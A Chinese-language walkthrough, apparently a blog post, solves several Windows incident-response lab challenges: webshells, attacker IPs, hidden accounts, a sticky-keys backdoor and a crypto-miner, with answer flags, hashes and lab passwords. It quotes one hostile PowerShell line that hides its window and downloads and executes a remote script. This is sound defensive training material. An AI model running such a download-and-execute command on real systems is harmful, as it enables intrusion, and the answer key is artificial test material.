靶机应急 | 知攻善防----Windows

• 靶场下载地址：https://mp.weixin.qq.com/s/opj5dJK7htdawkmLbsSJiQ

Windows应急靶场-web1

前景：

• 小李在值守的过程中，发现有CPU占用飙升，出于胆子小，就立刻将服务器关机，这是他的服务器系统，请你找出以下内容，并作为通关条件：

题目：

• 1.攻击者的shell密码

• 2.攻击者的IP地址

• 3.攻击者的隐藏账户名称

• 4.攻击者挖矿程序的矿池域名
• 用户-密码：administrator:Zgsf@admin.com

1、攻击者的shell密码

• 打开小P面板，找到网站根路径

• 上传D盾到靶机，扫描网站路径

• 右键选择打开相关目录，分析shell.php文件

• 进行md5的解密（https://www.somd5.com/?action=getpwd），密码为默认的--rebeyond

  

  

2、攻击者的IP地址

• 打开apache的日志文件--C:\phpstudy_pro\Extensions\Apache2.4.39\logs

• D盾查杀的webshell的名字为shell.php，所以搜索此文件查看攻击者IP

• 攻击者IP为--192.168.126.1

3、攻击者的隐藏账户名称

• 打开C盘的文件管理器，找到隐藏用户

• 也可以用D盾扫描

4、攻击者挖矿程序的矿池域名

• 在隐藏用户桌面下面找到了EXE的恶意程序（恶意程序是python伪装的exe）

• 利用pyinstxtractor（https://github.com/extremecoders-re/pyinstxtractor/releases），对程序进行反编译

• 将程序放到pyinstxtractor同一个目录下

• 反编译完成，在生成的Kuang.exe_extracted目录下找到Kuang.pyc文件，使用txt打开

• 找到矿池域名--http://wakuang.zhigongshanfang.top

• web1-结束！！！

Windows应急靶场-web2

前景：

• 小李在某单位驻场值守，深夜12点，甲方已经回家了，小李刚偷偷摸鱼后，发现安全设备有告警，于是立刻停掉了机器开始排查。

题目：

• 1.攻击者的 IP 地址（两个）

• 2.攻击者的 webshell 文件名

• 3.攻击者的 webshell 密码

• 4.攻击者的 QQ 号

• 5.攻击者的服务器伪 IP 地址

• 6.攻击者的服务器端口

• 7.攻击者是如何入侵的（选择题）

• 8.攻击者的隐藏用户名
• 靶机密码：Zgsf@qq.com

攻击者Webshell文件名和密码：

• 找到网站根路径，使用D盾进行目录扫描

• 找到攻击者文件名--system.php

• 使用记事本打开找到连接密码--hack6618

• 这就解决了2和3

攻击者第一个IP：

• 根据文件名称去搜索日志里的信息

  

• 找到第一个攻击者IP--192.168.126.135

• 这个 ip 和我们的 webshell 中的攻击 ip 是一样的

攻击方式：

• 查看FTP服务的日志文件，是通过FTP上传的shell文件

隐藏用户：

• 此电脑C盘找到隐藏用户名--hack887$（其他方法还有D盾扫描、注册表等）

攻击者第二个IP：

• 打开 windows 日志查看器的安全模块，查找hack887$的登录信息

• 看到攻击者第二个IP--192.168.126.129

服务器的伪IP和伪端口：

• 查看最近操作目录

• 打开frp.ini文件，找到--256.256.66.88:65535

攻击者的 QQ 号：

• 打开位置查看

• 上面这行数字就是QQ

• web2-结束！！！

Windows应急靶场-web3

前景：

• 小苕在省护值守中，在灵机一动情况下把设备停掉了，甲方问：为什么要停设备？小苕说：我第六感告诉我，这机器可能被黑了。

题目：

• 1、攻击者的两个IP地址

• 2、隐藏用户名称

• 3、黑客遗留下的flag【3个】
• 账号-密码：administrator/xj@123456

两个IP和隐藏用户

• 同样进行D盾查杀

• 打开找到的php文件，是一句话木马

• 根据文件名进行搜索，找到一个IP--192.168.75.129

• 同样的方法找到隐藏的用户名--hack6618$

• 打开事件查看器，搜索用户名找到第二个IP--192.168.75.130

三个flag：

##### 1、打开计划任务：win+r 输入taskschd.msc

• 找到第一个flag--flag{zgsfsys@sec}

##### 2、查看操作找到计划任务的程序

![](https://i-blog.csdnimg.cn/img_convert/4b5663b18d3c8b18aff84b23daa79277.png)

• 检查一下 system.bat 文件右键编辑

• 找到第二个flag-- flag{888666abc}

##### 3、需要启动web程序

• 打开Apache和Mysql

• 点击登录后台但是需要账号和密码

• 去官网查看用户手册，找到重置密码的工具

  • 官网文档：https://docs.zblogcn.com/php/#/books/start-25-faq
  • 工具使用说明：https://bbs.zblogcn.com/thread-83419.html
  • 工具下载链接：https://update.zblogcn.com/tools/nologin.zip

• 下载好后将解压的PHP文件放到WWW目录下

• 然后访问重置密码工具，点击重置管理员密码

• 密码重置为：admin:12345678。之后进行登录

• 在用户管理-hack里面找到第三个flag--flag{H@Ck@sec}

• web3-结束！！！

Windows应急靶场-近源OS

前景：

• 小王从某安全大厂被优化掉后，来到了某私立小学当起了计算机老师。某一天上课的时候，发现鼠标在自己动弹，又发现除了某台电脑，其他电脑连不上网络。感觉肯定有学生捣乱，于是开启了应急。

题目：

• 1、攻击者的外网IP地址

• 2、攻击者的内网跳板IP地址

• 3、攻击者使用的限速软件的md5大写

• 4、攻击者的后门md5大写

• 5、攻击者留下的flag
• 账号-密码：Administrator:zgsf@2024
• 不好操作的话连接远程桌面

攻击者的内网跳板IP地址：

• 首先将设置文件显示隐藏文件--开始->设置->Alt->工具->文件夹选项

• 在桌面Lnk文件夹中发现test.bat

• powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.20.129:801/a'))"

• 点击编辑找到攻击者的内网跳板IP地址--192.168.20.129

攻击者的外网IP地址：

• 将桌面文件进行打包放到微步的云沙箱中--https://s.threatbook.com/

  

• 在进程详情中能看到恶意文件为 "学校放假通知-练习.doc" ，外网IP为 8.219.200.130

攻击者使用的限速软件的md5大写：

• 继续排查：在C:\PerfLogs\666\666\777\666\666\666\666\666\666\666\666\666\666\666发现了可疑程序--p2pover4.34.exe

• AI搜索一下p2pover4.34的功能

• 这是个控制网速的软件

• 然后计算该程序的MD5的值--CertUtil -hashfile p2pover4.34.exe MD5

• MD5值（大写）：2a5d8838bdb4d404ec632318c94adc96

攻击者的后门md5大写&攻击者留下的flag

• 检查启动项、计划任务、服务未发现异常，排查shift后门时（连续点击shift键5次），发现攻击者留的后门。同时也找到了flag--flag{zgsf@shift666}

• 搜索定位which sethc.exe，同样的方法计算MD5：58A3FF82A1AFF927809C529EB1385DA1

• 近源OS-结束！！！

Windows应急靶场-挖矿事件

前景：

• 机房运维小陈，下班后发现还有工作没完成，然后上机器越用越卡，请你帮他看看原因。

题目：

• 1、攻击者的IP地址

• 2、攻击者开始攻击的时间

• 3、攻击者攻击的端口

• 4、挖矿程序的md5

• 5、后门脚本的md5

• 6、矿池地址

• 7、钱包地址

• 8、攻击者是如何攻击进入的
• 账号-密码：Administrator/zgsf@123

挖矿程序的md5

• "越用越卡"，打开任务管理器，发现一个XMRig miner的进程占用了大部分的CPU资源

• 定位到文件夹，计算挖矿程序MD5--CertUtil -hashfile xmrig.exe MD5

• 挖矿程序的md5：a79d49f425f95e70ddf0c68c18abc564

后门脚本的md5&矿池地址&钱包地址

• 上传火绒剑检查计划任务，发现未知文件--火绒剑：https://pan.quark.cn/s/58d405d8b9f7

• 在启动项的计划任务中发现未知文件

• 右键-查看文件，定位查看文件内容，是一段powershell脚本

• 问AI，分析这段脚本并问题那个是钱包，钱包地址--4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y

• 微步分析脚本中的链接

• 矿池链接--https://download.c3pool.org

  

• 同样的方法计算MD5--certutil -hashfile systems.bat MD5

• 后门脚本MD5（大写）--8414900f4c896964497c2cf6552ec4b9

攻击者的IP地址&攻击者开始攻击的时间

• 上传日志检查工具，GitHub链接：https://github.com/dogadmin/windodws-logs-analysis

• 查看登录失败日志，发现 192.168.115.131 有大量登录失败记录，最早时间为 2024-05-21 20:25:22

• 攻击者IP--192.168.115.131

• 攻击时间--2024-05-21 20:25:22

攻击者是如何攻击进入的&攻击者攻击的端口

• 再查看登陆成功日志，192.168.115.131 有登录成功记录，可判断攻击者是通过暴力破解进来的

• 攻击方式--暴力破解

• 攻击端口为--3389

• 挖矿-结束！！！